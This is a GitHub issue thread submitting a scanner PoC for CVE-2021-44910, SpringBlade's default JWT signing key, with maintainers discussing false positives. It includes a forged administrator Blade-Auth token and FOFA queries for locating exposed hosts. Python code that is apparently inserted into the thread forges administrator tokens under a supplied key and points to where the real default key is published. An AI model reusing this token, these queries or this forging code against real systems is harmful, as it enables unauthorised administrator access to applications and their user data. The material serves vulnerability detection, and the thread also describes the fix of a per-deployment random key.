CVE-2021-44910 #124

Open
leonardo-o1 opened this issue Apr 26, 2024 · 4 comments

Comments


leonardo-o1 commented Apr 26, 2024

FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
Verification:
(screenshot of the verification request and its response)

```yaml
id: CVE-2021-44910  # identifier; must match the file name, and every colon is followed by a space

info:   # PoC metadata; mind the indentation, YAML expresses nesting by indentation much like Python
  name: SpringBlade framework JWT authentication flaw
  author: leo   # author
  severity: high    # severity level: info, low, medium, high, critical
  tags: SpringBlade
  verified: true  # true: the PoC has been verified, false: not verified
  description: |    # description and fingerprint; "|" starts a YAML multi-line block
   SpringBlade's JWT is signed with a default key, so the login credential (JWT) can be forged at will
   FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
  reference: # referenced articles
  - https://forum.butian.net/share/973
  - https://github.com/chillzhuang/blade-tool/blob/master/blade-core-launch/src/main/java/org/springblade/core/launch/constant/TokenConstant.java  # "- " starts a list item
  - https://github.com/dockererr/CVE-2021-44910_SpringBlade/blob/main/CVE-2021-44910.py

rules:  # the PoC body: the rule set
  r0:   # rule name is arbitrary; unauthenticated request, expected to be rejected
    request:  # request definition
      method: GET  # POST, PUT or GET
      path: /api/blade-user/info  # other candidate paths: /api/blade-user/user-list, /api/blade-log/api/list
    expression: response.status == 401 && response.body.bcontains(b'"code":401')

  r1:   # same request, now carrying a token forged under the default key
    request:  # request definition
      method: GET  # POST, PUT or GET
      path: /api/blade-user/info  # other candidate paths: /api/blade-user/user-list, /api/blade-log/api/list
      headers:
          Blade-Auth: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg
    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"success":true')

expression: r0() && r1()  # vulnerable only when the unauthenticated request is rejected and the forged token is accepted
```
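The token in the Blade-Auth header above is an HS512 JWT whose claims are readable without any key, and whose signature only has to be recomputed under SpringBlade's default key. The following is an added example, not the PoC author's script and not blade-tool code: it decodes the posted token without verification, rebuilds the same claims and signs them with a caller-supplied key, and checks a token the way the server does. The real default SIGN_KEY is in the TokenConstant.java file linked in the references; DEMO_KEY below is a constructed placeholder so the round trip runs offline, and the `Blade-Auth: bearer <token>` header form is taken from the PoC.

```python
import base64
import hashlib
import hmac
import json

# Token copied from the Blade-Auth header in the PoC above (header.claims.signature)
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9."
    "eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9."
    "-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg"
)

# Constructed placeholder; the real default SIGN_KEY lives in TokenConstant.java (see references)
DEMO_KEY = b"constructed-demo-key-not-the-real-default"


def b64url_encode(raw):
    """JWT segments use base64url without '=' padding."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment):
    """Restore the padding the token stripped, then decode."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_unverified(token):
    """Return (header, claims) of a JWT without checking the signature."""
    header_b64, claims_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(claims_b64))


def sign_hs512(claims, key):
    """Build header.claims.signature with HMAC-SHA512 over compact JSON."""
    header = {"typ": "JWT", "alg": "HS512"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )
    mac = hmac.new(key, signing_input.encode("ascii"), hashlib.sha512).digest()
    return signing_input + "." + b64url_encode(mac)


def verify_hs512(token, key):
    """Server-side check: pin the algorithm, recompute the MAC, compare in constant time."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS512":
        return False  # never let the token choose the algorithm
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode("ascii"), hashlib.sha512).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def forge_admin_token(key, user_id="1123598821738675201", role_id="1123598816738675201"):
    """Reproduce the PoC's claims (administrator role, same ids) under the given key."""
    claims = {"role_name": "administrator", "user_id": user_id, "role_id": role_id}
    return sign_hs512(claims, key)


def blade_auth_header(token):
    """The header the PoC sends; SpringBlade reads its token from Blade-Auth."""
    return {"Blade-Auth": "bearer " + token}


if __name__ == "__main__":
    header, claims = decode_unverified(PAGE_TOKEN)
    print("header:", header)
    print("claims:", claims)
    forged = forge_admin_token(DEMO_KEY)
    print("forged header.claims equals the posted one:", forged.split(".")[:2] == PAGE_TOKEN.split(".")[:2])
    print(blade_auth_header(forged))
```

With the real default key substituted for DEMO_KEY, `forge_admin_token` reproduces the header and claims segments byte for byte (both encode the same compact JSON) and only the third segment changes, which is exactly why any instance still running with the shipped SIGN_KEY accepts the PoC's token. The fix on the server side is a per-deployment random key of at least 64 bytes for HS512 plus the algorithm pin shown in `verify_hs512`.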
zan8in (Owner) commented Apr 26, 2024

Thanks, but your expression check is too simple and prone to false positives; adding some uniqueness checks next time would be better.

leonardo-o1 (Author) commented Apr 26, 2024

> Thanks, but your expression check is too simple and prone to false positives; adding some uniqueness checks next time would be better.

OK, I added a check that the unauthenticated request returns 401; take another look?

zan8in (Owner) commented Apr 26, 2024

Nice approach. I wrote a PoC for this vulnerability earlier and have now uploaded it to GitHub; have a look at whether your PoC should be merged into it.

ViCrack commented Apr 26, 2024

No need to add the unauthenticated pre-check, that saves a request. Going by the screenshot, the returned JSON has quite a few fields, so adding field features should be enough:

```yaml
      - '"success":true'
      - '"account":'
      - '"password":'
      - createDept
      - xxxxxxx
      - xxxxxxxx
```

(screenshot of the /api/blade-user/info response)

nuclei also has a YAML template for this one.
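To make ViCrack's point concrete, here is an added example (not the PoC from this thread and not the scanner's own matcher) that runs the original r1 expression and a stricter field-based match over constructed sample responses. The distinctive field names come from ViCrack's list above; the response bodies are made up here and the 401 pre-check from the revised PoC is kept as an optional second input.

```python
import json

# Field names ViCrack lists as distinctive of the /api/blade-user/info record
REQUIRED_DATA_FIELDS = ("account", "password", "createDept")


def original_r1(status, body):
    """The PoC's r1 expression as posted: status plus two substring checks."""
    return status == 200 and '"code":200' in body and '"success":true' in body


def strict_r1(status, body):
    """Stricter match: parse the JSON and demand the user-record fields under data."""
    if status != 200:
        return False
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if doc.get("code") != 200 or doc.get("success") is not True:
        return False
    data = doc.get("data")
    return isinstance(data, dict) and all(name in data for name in REQUIRED_DATA_FIELDS)


def r0(status, body):
    """Unauthenticated pre-check from the revised PoC: expect 401 with code 401."""
    return status == 401 and '"code":401' in body


def vulnerable(auth_response, unauth_response=None):
    """Verdict: the forged-token response must look like a real user record,
    and, when an unauthenticated probe was sent, that probe must have been rejected."""
    if unauth_response is not None and not r0(*unauth_response):
        return False
    return strict_r1(*auth_response)


# Constructed sample responses (not captured from a real host); compact JSON like a server would emit
USER_INFO_200 = (200, json.dumps({
    "code": 200, "success": True, "msg": "ok",
    "data": {"id": "1123598821738675201", "account": "admin",
             "password": "<bcrypt hash>", "createDept": "0"},
}, separators=(",", ":")))
GENERIC_200 = (200, '{"code":200,"success":true,"data":"pong","msg":"ok"}')  # any other JSON API
NO_TOKEN_401 = (401, '{"code":401,"success":false,"data":null,"msg":"missing token"}')

if __name__ == "__main__":
    print("original r1 on a generic 200:", original_r1(*GENERIC_200))  # matches: false positive
    print("strict r1 on a generic 200:", strict_r1(*GENERIC_200))
    print("strict r1 on user info:", strict_r1(*USER_INFO_200))
    print("verdict with pre-check:", vulnerable(USER_INFO_200, NO_TOKEN_401))
```

The generic response satisfies the posted r1 expression, which is the false positive zan8in warned about; parsing the body and requiring `account`, `password` and `createDept` under `data` rejects it without the extra request, while the 401 pre-check remains available for hosts where that extra confidence is worth one more packet.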
